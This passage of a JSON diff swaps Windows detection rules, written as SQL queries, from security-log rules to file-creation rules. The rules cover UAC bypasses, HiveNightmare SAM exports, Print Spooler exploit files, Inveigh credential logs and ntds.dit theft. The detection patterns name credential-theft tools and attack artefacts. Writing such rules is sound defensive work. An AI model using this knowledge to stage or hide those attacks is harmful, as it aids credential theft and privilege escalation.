"file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - 